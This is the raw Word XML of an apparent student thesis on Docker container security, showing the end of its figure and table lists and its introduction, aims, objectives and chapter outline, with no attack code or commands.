            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867550 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>80</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C775E5A" w14:textId="1D2D1894"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51" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 70: the project plan with Gantt chart.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867551 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>80</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A6B994F" w14:textId="6BE0ADD3" w:rsidR="009B5C8A" w:rsidRDefault="00E6142E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86867552" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 71: Logbook.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867552 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>81</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D6E1CAF" w14:textId="0C911EB7" w:rsidR="00335AC3" w:rsidRDefault="009B5C8A" w:rsidP="00B669F0">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36540608" w14:textId="4632FB6D" w:rsidR="005A6307" w:rsidRDefault="00F80706" w:rsidP="00F80706">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F80706">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LIST OF TABLES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE4694E" w14:textId="5A8CD7D3" w:rsidR="005D40EF" w:rsidRPr="00F80706" w:rsidRDefault="005D40EF" w:rsidP="005D40EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TABLES                                                                                                                         PAGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204AD470" w14:textId="440EF31B" w:rsidR="005A6307" w:rsidRDefault="005A6307">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"Table" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc86867553" w:history="1">
        <w:r w:rsidRPr="00891A8E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Table 1: differences between containers and VM </w:t>
        </w:r>
        <w:r w:rsidRPr="00891A8E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[12]</w:t>
        </w:r>
        <w:r w:rsidRPr="00891A8E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867553 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58431E69" w14:textId="40A0A027" w:rsidR="008C4896" w:rsidRDefault="005A6307" w:rsidP="00B669F0">
      <w:pPr>
        <w:sectPr w:rsidR="008C4896" w:rsidSect="00551777">
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC3BA7C" w14:textId="45BD3088" w:rsidR="00335AC3" w:rsidRDefault="00335AC3" w:rsidP="00B669F0"/>
    <w:p w14:paraId="38416D16" w14:textId="3AAD53A1" w:rsidR="00626989" w:rsidRDefault="004F547D" w:rsidP="0015174E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc87032882"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003067C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C961D3">
        <w:t>INTRODUCTION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="00C961D3">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515DF090" w14:textId="25F33029" w:rsidR="00CE4828" w:rsidRDefault="008B13AA" w:rsidP="00D44C09">
      <w:r>
        <w:t>Docker has recently become one of the most popular ways to deploy applications</w:t>
      </w:r>
      <w:r w:rsidR="000C121D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C121D">
        <w:t>mainly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because of its flexibility, speed</w:t>
      </w:r>
      <w:r w:rsidR="000B44D3">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and ease of use.</w:t>
      </w:r>
      <w:r w:rsidR="000C121D">
        <w:t xml:space="preserve"> It is a containerisation platform that lets users </w:t>
      </w:r>
      <w:r w:rsidR="007621A5">
        <w:t xml:space="preserve">run one or more isolated containers </w:t>
      </w:r>
      <w:r w:rsidR="00833D69">
        <w:t xml:space="preserve">packaged with application libraries and dependencies. Containers </w:t>
      </w:r>
      <w:r w:rsidR="000B44D3">
        <w:t xml:space="preserve">employ similar concepts to </w:t>
      </w:r>
      <w:r w:rsidR="00D50B9F">
        <w:t>virtualisation,</w:t>
      </w:r>
      <w:r w:rsidR="000B44D3">
        <w:t xml:space="preserve"> but they are created at the </w:t>
      </w:r>
      <w:r w:rsidR="009D5F57">
        <w:t>OS level and make system calls directly to the host’s kernel.</w:t>
      </w:r>
      <w:r w:rsidR="00D50B9F">
        <w:t xml:space="preserve"> Simply put, </w:t>
      </w:r>
      <w:r w:rsidR="00561DE9">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00D50B9F">
        <w:t>container share</w:t>
      </w:r>
      <w:r w:rsidR="00561DE9">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D50B9F">
        <w:t xml:space="preserve"> the host’s kernel directly</w:t>
      </w:r>
      <w:r w:rsidR="00561DE9">
        <w:t xml:space="preserve"> with others</w:t>
      </w:r>
      <w:r w:rsidR="00AD0953">
        <w:t xml:space="preserve">, and this </w:t>
      </w:r>
      <w:r w:rsidR="005D4706">
        <w:t>gives users the flexibility to run an application on a single host machine, across multiple machines, and on a new machine all at once. It also allows users to scale their deployments</w:t>
      </w:r>
      <w:r w:rsidR="00210FC6">
        <w:t xml:space="preserve"> easily</w:t>
      </w:r>
      <w:r w:rsidR="005D4706">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD0953">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FA17C6" w14:textId="1EB0EC1F" w:rsidR="0089095C" w:rsidRDefault="00AD0953" w:rsidP="00D44C09">
      <w:r>
        <w:t xml:space="preserve">Further, containers are lightweight and </w:t>
      </w:r>
      <w:r w:rsidR="00210FC6">
        <w:t>super-fast;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unlike VM</w:t>
      </w:r>
      <w:r w:rsidR="00210FC6">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> they do not require an OS boot.</w:t>
      </w:r>
      <w:r w:rsidR="00210FC6">
        <w:t xml:space="preserve"> As to </w:t>
      </w:r>
      <w:r w:rsidR="00774327">
        <w:t xml:space="preserve">portability, containers package an application with all the necessary libraries and dependencies it needs to run. This enables users and developers to migrate and move across different </w:t>
      </w:r>
      <w:r w:rsidR="00CE4828">
        <w:t>environments</w:t>
      </w:r>
      <w:r w:rsidR="00210FC6">
        <w:t xml:space="preserve"> easily</w:t>
      </w:r>
      <w:r w:rsidR="00CE4828">
        <w:t xml:space="preserve">. For those reasons, Docker has become dominant </w:t>
      </w:r>
      <w:r w:rsidR="007F31E9">
        <w:t>in the containerisation market and is adopted by big companies, such as Google, Facebook, Spotify, and PayPal</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2141530942"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00150F98">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00150F98">
            <w:instrText xml:space="preserve"> CITATION BWo17 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00150F98">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00150F98">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007F31E9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003220A8">
        <w:t xml:space="preserve"> In general, Docker can potentially provide a wide range of benefits, but the key ones are economic, agility, and resiliency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780B400" w14:textId="328F40F4" w:rsidR="0089095C" w:rsidRDefault="00D47586" w:rsidP="00D44C09">
      <w:r>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidR="002B07A0">
        <w:t>Docker is a recent technology, and its security system is immature. Whil</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t xml:space="preserve">st </w:t>
      </w:r>
      <w:r w:rsidR="002B07A0">
        <w:t xml:space="preserve">Docker provides </w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>scalability</w:t>
      </w:r>
      <w:r w:rsidR="002B07A0">
        <w:t>, agility, resiliency</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002B07A0">
        <w:t xml:space="preserve"> and many other benefits, </w:t>
      </w:r>
      <w:r w:rsidR="001A0545">
        <w:t xml:space="preserve">its </w:t>
      </w:r>
      <w:r w:rsidR="002B07A0">
        <w:t xml:space="preserve">security is becoming the main concern for </w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t>developers and DevOps.</w:t>
      </w:r>
      <w:r w:rsidR="00C60AE9">
        <w:t xml:space="preserve"> This is mainly </w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>because</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C60AE9">
        <w:t>Docker c</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t>ontainers share the host kernel directly</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>making them</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t xml:space="preserve"> more vulnerable </w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00243A03">
        <w:t xml:space="preserve"> security threats and vulnerabilities than </w:t>
      </w:r>
      <w:r w:rsidR="001A0545">
        <w:t xml:space="preserve">the traditional virtualisation technology (VM). Simply put, Docker does not provide </w:t>
      </w:r>
      <w:r w:rsidR="00441EDA">
        <w:t>more splendid</w:t>
      </w:r>
      <w:r w:rsidR="001A0545">
        <w:t xml:space="preserve"> isolation from the host machine</w:t>
      </w:r>
      <w:r w:rsidR="00441EDA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A0545">
        <w:t>compar</w:t>
      </w:r>
      <w:r w:rsidR="00441EDA">
        <w:t xml:space="preserve">ed </w:t>
      </w:r>
      <w:r w:rsidR="001A0545">
        <w:t>to VMs.</w:t>
      </w:r>
      <w:r w:rsidR="001357A1">
        <w:t xml:space="preserve"> In addition, its </w:t>
      </w:r>
      <w:r w:rsidR="002E0058">
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:r w:rsidR="001357A1">
        <w:t xml:space="preserve">design encompasses various </w:t>
      </w:r>
      <w:r w:rsidR="002E0058">
        <w:t>components, containing from the host to the network and everything in between. As such, its security requires an all-inclusive approach</w:t>
      </w:r>
      <w:r w:rsidR="00E03FDE">
        <w:t xml:space="preserve"> and therefore ensuring the security of containers is difficult for many enterprises and DevOps. Therefore, securing Docker containers is significant and needs securing all its components </w:t>
      </w:r>
      <w:r w:rsidR="005B11D4">
        <w:t>from the host to the network. Another security challenge to Docker users is uploading and downloading images.</w:t>
      </w:r>
      <w:r w:rsidR="00FB30CF">
        <w:t xml:space="preserve"> It uses Docker hub as a repository to share and find images and operates similar</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidR="00FB30CF">
        <w:t xml:space="preserve"> to google or apple store</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FB30CF">
        <w:t xml:space="preserve"> where users can download and install apps whatever they want</w:t>
      </w:r>
      <w:r w:rsidR="00ED168C">
        <w:t>. This means that threat actors can insert malicious codes</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00ED168C">
        <w:t xml:space="preserve"> and users can download and use </w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>them</w:t>
      </w:r>
      <w:r w:rsidR="00A11594">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00ED168C">
        <w:t xml:space="preserve"> enabling the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00ED168C">
        <w:lastRenderedPageBreak/>
        <w:t>to steal or infiltrate valuable information.</w:t>
      </w:r>
      <w:r w:rsidR="00A11594">
        <w:t xml:space="preserve"> For those reasons, it is vital to investigate and study the security structure of Docker involving all its components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DCEE4" w14:textId="5549A761" w:rsidR="00A11594" w:rsidRDefault="00A11594" w:rsidP="00D44C09">
      <w:r>
        <w:t xml:space="preserve">This thesis comprises the research, </w:t>
      </w:r>
      <w:r w:rsidR="00A0006D">
        <w:t>techniques, and discussions of Docker security threats and attacks along with their various mitigation or remediation strategies. It covers and introduces in</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A0006D">
        <w:t xml:space="preserve">depth </w:t>
      </w:r>
      <w:r w:rsidR="008A56AF">
        <w:t>knowledge of Docker technology, particular</w:t>
      </w:r>
      <w:r w:rsidR="00F06F27">
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidR="008A56AF">
        <w:t xml:space="preserve"> related to its security system and is presented both in practical and theoretical approaches. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346A8020" w14:textId="0AF8E923" w:rsidR="006C2B5A" w:rsidRDefault="006C2B5A" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc87032883"/>
      <w:r>
        <w:t>AIM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="2761700D" w14:textId="60B7E107" w:rsidR="006C2B5A" w:rsidRPr="006C2B5A" w:rsidRDefault="006C2B5A" w:rsidP="006C2B5A">
      <w:r>
        <w:t>This thesis aims to examine and evaluate Docker containers security with misconfigured images.</w:t>
      </w:r>
      <w:r w:rsidR="00BC6360">
        <w:t xml:space="preserve"> The report</w:t>
      </w:r>
      <w:r w:rsidR="009150BA">
        <w:t xml:space="preserve"> will</w:t>
      </w:r>
      <w:r w:rsidR="00BC6360">
        <w:t xml:space="preserve"> provide three types of Docker security attacks supplemented with practical approach</w:t>
      </w:r>
      <w:r w:rsidR="009150BA">
        <w:t xml:space="preserve"> to achieve the aim of this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCB7E97" w14:textId="6B1D965F" w:rsidR="006C2B5A" w:rsidRDefault="006C2B5A" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc87032884"/>
      <w:r>
        <w:t>OBJECTIVES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="691E9A7E" w14:textId="11673E2A" w:rsidR="00BC6360" w:rsidRDefault="00BC6360" w:rsidP="00BC6360">
      <w:r>
        <w:t xml:space="preserve">The project is also set to provide several objectives with regards to the completion of the </w:t>
      </w:r>
      <w:r w:rsidR="009150BA">
        <w:t>aim as listed below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C89E6F" w14:textId="76333B8C" w:rsidR="009150BA" w:rsidRDefault="009150BA" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Providing in depth background and research on Docker environment and containerisation technology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26806305" w14:textId="42585F8B" w:rsidR="009150BA" w:rsidRDefault="009150BA" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Providing literature review on the area of Docker security </w:t>
      </w:r>
      <w:r w:rsidR="00A00837">
        <w:t>threats and attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53561F47" w14:textId="4720E804" w:rsidR="00A00837" w:rsidRDefault="00FF4655" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identifying current Docker vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471BC91" w14:textId="7542FCA8" w:rsidR="002C211E" w:rsidRDefault="002C211E" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Conduct practical various security attacks on Docker environment along with documenting the process of each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80F604" w14:textId="1DF2BA6D" w:rsidR="00FF4655" w:rsidRDefault="00FF4655" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Providing recommendation and mitigation solutions to each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDBD284" w14:textId="25E3AD3F" w:rsidR="00FF4655" w:rsidRDefault="00FF4655" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Research into </w:t>
      </w:r>
      <w:r w:rsidR="002C211E">
        <w:t xml:space="preserve">the current </w:t>
      </w:r>
      <w:r>
        <w:t>best security practices of Docker containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7A193D" w14:textId="3D77B63A" w:rsidR="002C211E" w:rsidRDefault="002C211E" w:rsidP="009150BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analysing and evaluating the results obtained from each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD72773" w14:textId="58AE6206" w:rsidR="00331B7C" w:rsidRDefault="00331B7C" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc87032885"/>
      <w:r>
        <w:t>STRUCTURE OF THE PROJECT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="34F36482" w14:textId="61022198" w:rsidR="00093277" w:rsidRDefault="005A23F9" w:rsidP="00093277">
      <w:r>
        <w:t>This thesis contains</w:t>
      </w:r>
      <w:r w:rsidR="00CC5B4F">
        <w:t xml:space="preserve"> eleven chapters and is structured into three main sections to provide the reader </w:t>
      </w:r>
      <w:r w:rsidR="006A48FA">
        <w:t xml:space="preserve">with a sense of flow and </w:t>
      </w:r>
      <w:r w:rsidR="00B23571">
        <w:t>a better understanding on all concepts of the subject discussed.</w:t>
      </w:r>
      <w:r w:rsidR="00D6557C">
        <w:t xml:space="preserve"> The first section details the background research and literature review related to Docker architecture and security. The second section covers designing, implementing, testing, and experimenting of the practical approach to </w:t>
      </w:r>
      <w:r w:rsidR="00683254">
        <w:t>execute and process</w:t>
      </w:r>
      <w:r w:rsidR="00D6557C">
        <w:t xml:space="preserve"> the aimed Docker security attacks</w:t>
      </w:r>
      <w:r w:rsidR="00683254">
        <w:t>. Finally, the third section includes the findings and outcomes accompanied with analysing and evaluating of the results obtained from each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CFA255" w14:textId="0DFC8F92" w:rsidR="009B2382" w:rsidRDefault="009B2382" w:rsidP="00093277">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Chapter one provides a brief overview </w:t>
      </w:r>
      <w:r w:rsidR="005B02D1">
        <w:t>of the report, detailing the aims and objectives of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C869E" w14:textId="6CF431A2" w:rsidR="005B02D1" w:rsidRDefault="005B02D1" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter two covers a detailed background research on the fundamental elements of Docker systems</w:t>
      </w:r>
      <w:r w:rsidR="00E73776">
        <w:t>, security,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and architectures. It also discusses and compares traditional virtualisation </w:t>
      </w:r>
      <w:r w:rsidR="00E73776">
        <w:t xml:space="preserve">vs </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">containerisation technologies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F21110E" w14:textId="25F5CC0E" w:rsidR="00E73776" w:rsidRDefault="00E73776" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter three concentrates on literature review of previous works related to the</w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t xml:space="preserve"> research</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> topic</w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t xml:space="preserve">equip the author to </w:t>
      </w:r>
      <w:r w:rsidR="00FE08D8">
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t xml:space="preserve"> a solid </w:t>
      </w:r>
      <w:r w:rsidR="00FE08D8">
        <w:t xml:space="preserve">understanding and </w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t>knowledge on Docker security threats and attacks</w:t>
      </w:r>
      <w:r w:rsidR="00FE08D8">
        <w:t xml:space="preserve"> in general</w:t>
      </w:r>
      <w:r w:rsidR="000B37D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4F83BB" w14:textId="6311A7B2" w:rsidR="000B37D1" w:rsidRDefault="000B37D1" w:rsidP="00093277">
      <w:r>
        <w:t xml:space="preserve">Chapter four focuses on the research methodologies </w:t>
      </w:r>
      <w:r w:rsidR="00987185">
        <w:t>applied</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00987185">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:t>this project</w:t>
      </w:r>
